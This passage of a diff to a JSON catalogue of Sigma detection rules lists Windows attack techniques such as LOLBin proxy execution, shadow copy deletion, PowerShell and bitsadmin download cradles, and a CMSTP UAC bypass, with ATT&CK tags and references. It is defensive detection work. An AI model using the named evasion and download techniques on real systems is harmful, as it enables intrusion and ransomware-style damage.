- "attack.command_and_control", - "attack.t1105", "attack.defense_evasion", "attack.t1564.004" ] }, - "uuid": "cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", - "value": "PrintBrm ZIP Creation of Extraction" + "uuid": "45a594aa-1fbd-4972-a809-ff5a99dd81b8", + "value": "Run PowerShell Script from ADS" }, { - "description": "Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.", + "description": "Shadow Copies deletion using operating systems utilities", "meta": { - "author": "frack113", - "creation_date": "2022/05/28", + "author": "Florian Roth, Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)", + "creation_date": "2019/10/22", "falsepositive": [ - "Unknown" + "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason", + "LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)" ], - "filename": "proc_creation_win_lolbin_pubprn.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Scripts/Pubprn/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pubprn.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216.001" - ] - }, - "uuid": "1fb76ab8-fa60-4b01-bddd-71e89bf555da", - "value": "Pubprn.vbs Proxy Execution" - }, - { - "description": "Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p.", - "meta": { - "author": "Julia Fomina, oscd.community", - "creation_date": "2020/10/09", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_lolbin_rasautou_dll_execution.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Rasautou/", - "https://github.com/fireeye/DueDLLigence", - "https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "cd3d1298-eb3b-476c-ac67-12847de55813", - "value": "DLL Execution via Rasautou.exe" - }, - { - "description": "Detects suspicious execution of Regasm/Regsvcs utilities", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/25", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_regasm.yml", + "filename": "proc_creation_win_shadow_copies_deletion.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.fortiguard.com/threat-signal-report/4718?s=09", - "https://lolbas-project.github.io/lolbas/Binaries/Regasm/", - "https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml" + "https://redcanary.com/blog/intelligence-insights-october-2021/", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/", + "https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/", + "https://github.com/Neo23x0/Raccine#the-process", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://blog.talosintelligence.com/2017/05/wannacry.html", + "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/gen_ransomware_command_lines.yar", + "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadow_copies_deletion.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1218.009" + "attack.impact", + "attack.t1070", + "attack.t1490" ] }, - "uuid": "cc368ed0-2411-45dc-a222-510ace303cb2", - "value": "Regasm/Regsvcs Suspicious Execution" + "uuid": "c947b146-0abc-4c87-9c64-b17e9d7274a2", + "value": "Shadow Copies Deletion Using Operating Systems Utilities" + }, + { + "description": "Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wab_execution_from_non_default_location.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime", + "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution" + ] + }, + "uuid": "395907ee-96e5-4666-af2e-2ca91688e151", + "value": "Wab Execution From Non Default Location" + }, + { + "description": "Detects usage of bitsadmin downloading a file", + "meta": { + "author": "Michael Haag, FPT.EagleEye", + "creation_date": "2017/03/09", + "falsepositive": [ + "Some legitimate apps use this, but limited." + ], + "filename": "proc_creation_win_bitsadmin_download.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", + "https://isc.sans.edu/diary/22264", + "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" + ] + }, + "uuid": "d059842b-6b9d-4ed1-b5c3-5b89143c6ede", + "value": "Bitsadmin Download" + }, + { + "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", + "meta": { + "author": "Timur Zinniatullin, E.M. Anhaus, oscd.community", + "creation_date": "2019/10/21", + "falsepositive": [ + "Highly likely if rar is a default archiver in the monitored environment." + ], + "filename": "proc_creation_win_data_compressed_with_rar.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/1ec33c93-3d0b-4a28-8014-dbdaae5c60ae.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_data_compressed_with_rar.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ] + }, + "uuid": "6f3e2987-db24-4c78-a860-b4f4095a7095", + "value": "Data Compressed - rar.exe" + }, + { + "description": "Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", + "meta": { + "author": "Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali", + "creation_date": "2022/12/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_sharp_impersonation_tool.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://s3cur3th1ssh1t.github.io/SharpImpersonation-Introduction/", + "https://github.com/S3cur3Th1sSh1t/SharpImpersonation", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sharp_impersonation_tool.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1134.001", + "attack.t1134.003" + ] + }, + "uuid": "f89b08d0-77ad-4728-817b-9b16c5a69c7a", + "value": "SharpImpersonation Execution" + }, + { + "description": "Detects the import of the '.reg' files from suspicious paths using the 'reg.exe' utility", + "meta": { + "author": "frack113, Nasreddine Bencherchali", + "creation_date": "2022/08/01", + "falsepositive": [ + "Legitimate import of keys" + ], + "filename": "proc_creation_win_reg_import_from_suspicious_paths.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/reg-import", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml" + ], + "tags": [ + "attack.t1112", + "attack.defense_evasion" + ] + }, + "uuid": "62e0298b-e994-4189-bc87-bc699aa62d97", + "value": "Imports Registry Key From a File Using Reg.exe" + }, + { + "description": "Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/10", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_get_localgroup_member_recon.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_get_localgroup_member_recon.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.001" + ] + }, + "uuid": "c8a180d6-47a3-4345-a609-53f9c3d834fc", + "value": "Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet" + }, + { + "description": "Detects suspicious command line arguments of common data compression tools", + "meta": { + "author": "Florian Roth, Samir Bousseaden", + "creation_date": "2019/10/15", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_compression_params.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1184067445612535811", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_compression_params.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ] + }, + "uuid": "27a72a60-7e5e-47b1-9d17-909c9abafdcd", + "value": "Suspicious Compression Tool Parameters" + }, + { + "description": "Detects usage of the manage-bde.wsf script that may indicate an attempt of proxy execution from script", + "meta": { + "author": "oscd.community, Natalia Shornikova", + "creation_date": "2020/10/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_manage_bde_lolbas.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md", + "https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712", + "https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/", + "https://twitter.com/JohnLaTwC/status/1223292479270600706", + "https://twitter.com/bohops/status/980659399495741441", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_manage_bde_lolbas.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "c363385c-f75d-4753-a108-c1a8e28bdbda", + "value": "Suspicious Usage of the Manage-bde.wsf Script" + }, + { + "description": "The \"VSIISExeLauncher.exe\" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_vsiisexelauncher.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSIISExeLauncher/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ] + }, + "uuid": "18749301-f1c5-4efc-a4c3-276ff1f5b6f8", + "value": "Use of VSIISExeLauncher.exe" + }, + { + "description": "This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", + "meta": { + "author": "Agro (@agro_sev) oscd.community", + "creation_date": "2020/10/10", + "falsepositive": [ + "Direct PS command execution through SQLPS.exe is uncommon, childprocess sqlps.exe spawned by sqlagent.exe is a legitimate action." + ], + "filename": "proc_creation_win_susp_use_of_sqlps_bin.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/sql/tools/sqlps-utility?view=sql-server-ver15", + "https://twitter.com/bryon_/status/975835709587075072", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_sqlps_bin.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1127" + ] + }, + "uuid": "0152550d-3a26-4efd-9f0e-54a0b28ae2f3", + "value": "Detection of PowerShell Execution via Sqlps.exe" + }, + { + "description": "Detection of unusual child processes by different system processes", + "meta": { + "author": "Semanur Guneysu @semanurtg, oscd.community", + "creation_date": "2020/10/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_abusing_debug_privilege.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-74-638.jpg", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_abusing_debug_privilege.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548" + ] + }, + "uuid": "d522eca2-2973-4391-a3e0-ef0374321dae", + "value": "Abused Debug Privilege by Arbitrary Parent Processes" + }, + { + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_invoke_obfuscation_via_use_clip.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_use_clip.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "e1561947-b4e3-4a74-9bdd-83baed21bdb5", + "value": "Invoke-Obfuscation Via Use Clip" }, { "description": "Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.", @@ -40931,103 +33468,310 @@ "value": "REGISTER_APP.VBS Proxy Execution" }, { - "description": "Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files.", + "description": "Detects a service binary running in a suspicious directory", "meta": { - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", - "creation_date": "2022/06/02", - "falsepositive": [ - "Approved installs of Windows SDK with Debugging Tools for Windows (WinDbg)." - ], - "filename": "proc_creation_win_lolbin_remote.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Remote/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_remote.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1127" - ] - }, - "uuid": "4eddc365-79b4-43ff-a9d7-99422dc34b93", - "value": "Use of Remote.exe" - }, - { - "description": "Detects the use of Replace.exe which can be used to replace file with another file", - "meta": { - "author": "frack113", - "creation_date": "2022/03/06", + "author": "Florian Roth", + "creation_date": "2021/03/09", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_lolbin_replace.yml", - "level": "medium", + "filename": "proc_creation_win_susp_service_dir.yml", + "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Replace/", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/replace", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_replace.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ] - }, - "uuid": "9292293b-8496-4715-9db6-37028dcda4b3", - "value": "Replace.exe Usage" - }, - { - "description": "An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver", - "meta": { - "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io, TactiKoolSec", - "creation_date": "2022/04/28", - "falsepositive": [ - "Legitimate installation of a new screensaver" - ], - "filename": "proc_creation_win_lolbin_rundll32_installscreensaver.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Libraries/Desk/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_rundll32_installscreensaver.yml" - ], - "tags": [ - "attack.t1218.011", - "attack.defense_evasion" - ] - }, - "uuid": "15bd98ea-55f4-4d37-b09a-e7caa0fa2221", - "value": "Rundll32 InstallScreenSaver Execution" - }, - { - "description": "The \"ScriptRunner.exe\" binary can be abused to proxy execution through it and bypass possible whitelisting", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/01", - "falsepositive": [ - "Legitimate use when App-v is deployed" - ], - "filename": "proc_creation_win_lolbin_scriptrunner.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Scriptrunner/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_scriptrunner.yml" + "https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_dir.yml" ], "tags": [ "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "883faa95-175a-4e22-8181-e5761aeb373c", + "value": "Suspicious Service Binary Directory" + }, + { + "description": "Detects renamed vmnat.exe or portable version that can be used for DLL side-loading", + "meta": { + "author": "elhoim", + "creation_date": "2022/09/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_renamed_vmnat.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/malmoeb/status/1525901219247845376", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "7b4f794b-590a-4ad4-ba18-7964a2832205", + "value": "Renamed or Portable Vmnat.exe" + }, + { + "description": "Detects the use of tools created by a well-known hacktool producer named Cube0x0, which includes his handle in all binaries as company information in the PE headers (SharpPrintNightmare, KrbRelay, SharpMapExec etc.)", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/04/27", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_hack_cube0x0_tools.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.virustotal.com/gui/search/metadata%253ACube0x0/files", + "https://github.com/cube0x0", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_cube0x0_tools.yml" + ], + "tags": "No established tags" + }, + "uuid": "37c1333a-a0db-48be-b64b-7393b2386e3b", + "value": "Hacktool by Cube0x0" + }, + { + "description": "Detects Trickbot malware process tree pattern in which rundll32.exe is parent of wermgr.exe", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/11/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_malware_trickbot_wermgr.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20", + "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_trickbot_wermgr.yml" + ], + "tags": [ "attack.execution", + "attack.t1559" + ] + }, + "uuid": "58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27", + "value": "Trickbot Malware Activity" + }, + { + "description": "Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe'", + "meta": { + "author": "Konstantin Grishchenko, oscd.community", + "creation_date": "2020/10/17", + "falsepositive": [ + "Legitimate usage by software developers" + ], + "filename": "proc_creation_win_susp_csi.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Rcsi/", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/", + "https://twitter.com/Z3Jpa29z/status/1317545798981324801", + "https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csi.yml" + ], + "tags": [ + "attack.execution", + "attack.t1072", + "attack.defense_evasion", "attack.t1218" ] }, - "uuid": "64760eef-87f7-4ed3-93fd-655668ea9420", - "value": "Use of Scriptrunner.exe" + "uuid": "40b95d31-1afc-469e-8d34-9a3a667d058e", + "value": "Suspicious Csi.exe Usage" + }, + { + "description": "Detects the execution of a renamed ProcDump executable often used by attackers or malware", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/11/18", + "falsepositive": [ + "Procdump illegaly bundled with legitimate software", + "Administrators who rename binaries (should be investigated)" + ], + "filename": "proc_creation_win_renamed_procdump.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/procdump", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_procdump.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.003" + ] + }, + "uuid": "4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67", + "value": "Renamed ProcDump Execution" + }, + { + "description": "Detects LOLBINs executing from an abnormal drive such as a mounted ISO.", + "meta": { + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "creation_date": "2022/01/25", + "falsepositive": [ + "Rare false positives could occur on servers with multiple drives." + ], + "filename": "proc_creation_win_lolbin_not_from_c_drive.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.scythe.io/library/threat-emulation-qakbot", + "https://thedfirreport.com/2021/12/13/diavol-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_not_from_c_drive.yml" + ], + "tags": [ + "attack.t1218.001" + ] + }, + "uuid": "d4ca7c59-e9e4-42d8-bf57-91a776efcb87", + "value": "LOLBIN From Abnormal Drive" + }, + { + "description": "Detects execition of commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting.", + "meta": { + "author": "Nasreddine Bencherchali, E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "creation_date": "2022/06/14", + "falsepositive": [ + "Legitimate use by a via a batch script or by an administrator." + ], + "filename": "proc_creation_win_lolbin_pcalua.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Pcalua/", + "https://pentestlab.blog/2020/07/06/indirect-command-execution/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2", + "value": "Use of Pcalua For Execution" + }, + { + "description": "Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali", + "creation_date": "2022/01/24", + "falsepositive": [ + "Legitimate use by administrators" + ], + "filename": "proc_creation_win_tool_nircmd.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", + "https://www.nirsoft.net/utils/nircmd.html", + "https://www.nirsoft.net/utils/nircmd2.html#using", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_nircmd.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ] + }, + "uuid": "4e2ed651-1906-4a59-a78a-18220fca1b22", + "value": "NirCmd Tool Execution" + }, + { + "description": "Detects suspicious ways to download files or content and execute them using PowerShell", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/24", + "falsepositive": [ + "Scripts or tools that download files and execute them" + ], + "filename": "proc_creation_win_susp_powershell_download_iex.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_download_iex.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "85b0b087-eddf-4a2b-b033-d771fa2b9775", + "value": "PowerShell Web Download and Execution" + }, + { + "description": "Use of hostname to get information", + "meta": { + "author": "frack113", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_hostname.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/hostname", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-6---hostname-discovery-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_hostname.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1082" + ] + }, + "uuid": "7be5fb68-f9ef-476d-8b51-0256ebece19e", + "value": "Suspicious Execution of Hostname" + }, + { + "description": "Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)", + "meta": { + "author": "Nik Seetharaman, Christian Burkard", + "creation_date": "2019/07/31", + "falsepositive": [ + "Legitimate CMSTP use (unlikely in modern enterprise environments)" + ], + "filename": "proc_creation_win_cmstp_com_object_access.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", + "https://github.com/hfiref0x/UACME", + "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", + "https://twitter.com/hFireF0X/status/897640081053364225", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmstp_com_object_access.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" + ] + }, + "uuid": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253", + "value": "CMSTP UAC Bypass via COM Object Access" }, { "description": "Detects using SettingSyncHost.exe to run hijacked binary", @@ -41055,761 +33799,432 @@ "value": "Using SettingSyncHost.exe as LOLBin" }, { - "description": "Detects the usage of the \"sftp.exe\" binary as a LOLBIN by abusing the \"-D\" flag", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/11/10", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_sftp.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/pull/264", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_sftp.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218" - ] - }, - "uuid": "a85ffc3a-e8fd-4040-93bf-78aff284d801", - "value": "Use Of The SFTP.EXE Binary As A LOLBIN" - }, - { - "description": "Detects the execution utitilies often found in Visual Studio tools that hardcode the call to the binary \"link.exe\". They can be abused to sideload any binary with the same name", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/22", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_sideload_link_binary.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/0gtweet/status/1560732860935729152", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_sideload_link_binary.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "6e968eb1-5f05-4dac-94e9-fd0c5cb49fd6", - "value": "Sideloading Link.EXE" - }, - { - "description": "Detects the execution of sigverif binary as a parent process which could indicate it being used as a LOLBIN to proxy execution", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/19", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_sigverif.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/", - 